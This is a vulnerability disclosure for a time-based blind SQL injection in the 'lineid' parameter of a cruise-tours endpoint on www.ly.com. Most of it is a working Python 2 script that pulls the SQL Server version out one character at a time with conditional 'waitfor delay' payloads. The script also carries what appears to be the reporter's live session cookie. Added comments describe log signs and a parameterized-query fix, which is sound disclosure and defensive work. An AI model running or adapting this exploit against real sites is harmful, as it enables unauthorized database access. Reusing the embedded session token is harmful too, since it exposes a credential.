A blind SQL injection vulnerability exists in the main site of Tongcheng Network (with verification script)
Blind SQL injection on the main site
The `lineid` parameter of http://www.ly.com/youlun/CruiseTours/CruiseToursAjax.aspx?Type=GetToursLineContent&iid=0.7168335842458044&lineid=70855 is vulnerable to blind SQL injection.
If the results are unstable, the timing parameters need to be adjusted.
#-*-coding:utf-8-*-
# Verification script attached to the disclosure (Python 2: `print` statements,
# httplib). It probes a time-based blind SQL injection in the `lineid` query
# parameter: each request appends a conditional `waitfor delay '0:0:5'` to the
# value, and a request that exceeds the 4-second client timeout (httplib raises)
# is interpreted as the injected condition being true.
# Defender's view: the telltales in the access log are `@@version`, `substring(`,
# `waitfor delay` and a quote character inside what should be an integer
# `lineid`, plus a burst of requests from one client whose server-side response
# time clusters around 5 seconds. The fix is to validate `lineid` as an integer
# and pass it to the database through a parameterized query rather than string
# concatenation.
import httplib
import time
import string
import sys
import random
import urllib

# NOTE(review): the Cookie header is the reporter's own browser session copied
# verbatim, including an ASP.NET_SessionId and several load-balancer cookies.
# A live session token committed into a script is a credential leak; whether the
# probe needs any session at all is not shown here.
headers = { 'Cookie': 'Hm_lvt_f97c1b2277f4163d4974e7b5c8aa1e96=1421055383,1421056354,1421135352,1421135572; Hm_lvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581413; SearchNew=%25E5%25A4%25A7%25E7%2590%2586%2526%25E5%258C%2597%25E4%25BA%25AC%25262015-02-02%2526%2526%2526; BIGipServerdj-ly-com-pool=3422687404.20480.0000; ASP.NET_SessionId=3pahjdtqnqdjxj3rmrvr25y4; route=e7880858d53355284a6c3af0a94e1de3; BIGipServertengine-api-pool=3775271084.20480.0000; Hm_lpvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581784; BIGipServerly-zhuanti=469962924.8963.0000; BIGipServerly-huochepiao=2986479788.8707.0000; BIGipServerly-huochepiao-resource=3489861804.8451.0000; BIGipServerly-huochepiao-search=2197950636.8451.0000; BIGipServerly-news-lvs=1376129196.20480.0000; BIGipServerly-lvs=1376129196.20480.0000; BIGipServerly-youlun=4194439340.8963.0000; 17uCNRefId=-1; TicketSEInfo=RefId=0&SEFrom=&SEKeyWords=; CNSEInfo=RefId=0&SEFrom=&SEKeyWords=&RefUrl=; __tctmc=144323752.95750554; __tctmd=144323752.88932893; __tctmu=144323752.0.0; __tctmz=144323752.1422589270801.7.6.utmccn=(referral)|utmcsr=http:|utmcct=show/5|utmcmd=referral; longKey=1422588589273300; KOInfo=KOId=0; COMSEInfo=RefId=1308721&SEFrom=&SEKeyWords=&RefUrl=; passport_login_state=pageurl=http%3a%2f%2fgo.ly.com%2fyouji%2f1774354.html; Hm_lpvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422589021; __tctma=144323752.1420797897384185.1420797897683.1422580182505.1422588301145.7; MAIF=||; MAIH=24489,24489,24489,77415,77415,135,24489,24489,24489; searchHistory=%E5%8C%97%E4%BA%AC,53,0,2015-01-13,2015-01-14; ABTest_115=657#1#42952259; MAIQZ=131; MAIHL=201448,201448,70855; __tctmb=144323752.2935134128776432.1422589508896.1422589539854.20; whichIndex=13; twoIndex=5; Hm_lvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422588841; Hm_lvt_0f71f0877229e4e6503de92a28cbf166=1422589516; Hm_lpvt_0f71f0877229e4e6503de92a28cbf166=1422589546', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}

# Candidate characters tried at each position of @@version: ASCII letters,
# digits and a handful of punctuation characters.
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Try to retrive SQL Server Version:'
user = ''
# Positions 1..29 of @@version; for each position every candidate is sent
# until one request raises (taken as a timeout), then the next position starts.
for i in range(1,30,1):
    for payload in payloads:
        timeout_count = 0
        try:
            # The 4-second client timeout is shorter than the 5-second delay the
            # payload requests, so a matching character surfaces as an exception.
            conn = httplib.HTTPConnection('www.ly.com', timeout=4)
            random.seed()
            #area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- " % (i, ord(payload))
            #print i
            #print ord(payload)
            #headers['Cookie'] = "area=" + urllib.quote(area)
            # Percent-encoded injection appended directly to the lineid value;
            # the quote after 70855 is what a server-side integer check would
            # have rejected.
            url="/youlun/CruiseTours/CruiseToursAjax.aspx?Type=GetToursLineContent&lineid=70855"+"'if%28ascii%28substring%28%40%40version%2c"+str(i)+"%2c1%29%29="+str(ord(payload))+"%29waitfor%20delay'0%3a0%3a5'--"
            #print url
            #time.sleep(0.1)
            start_time = time.time()  # recorded but never read
            conn.request(method='GET', url=url, headers = headers)
            conn.getresponse()
            conn.close()
            print '.',
        except Exception as e:
            # Any exception, not only the socket timeout, lands here.
            #print e
            timeout_count += 1
            if(timeout_count==1):
                user += payload
                print '[In Progress]', user
                break
print '\n[Done], SQL Server version is', user
Solution:
Filter and validate the parameters (for example, reject a non-integer `lineid` and pass it to the database through a parameterized query rather than string concatenation).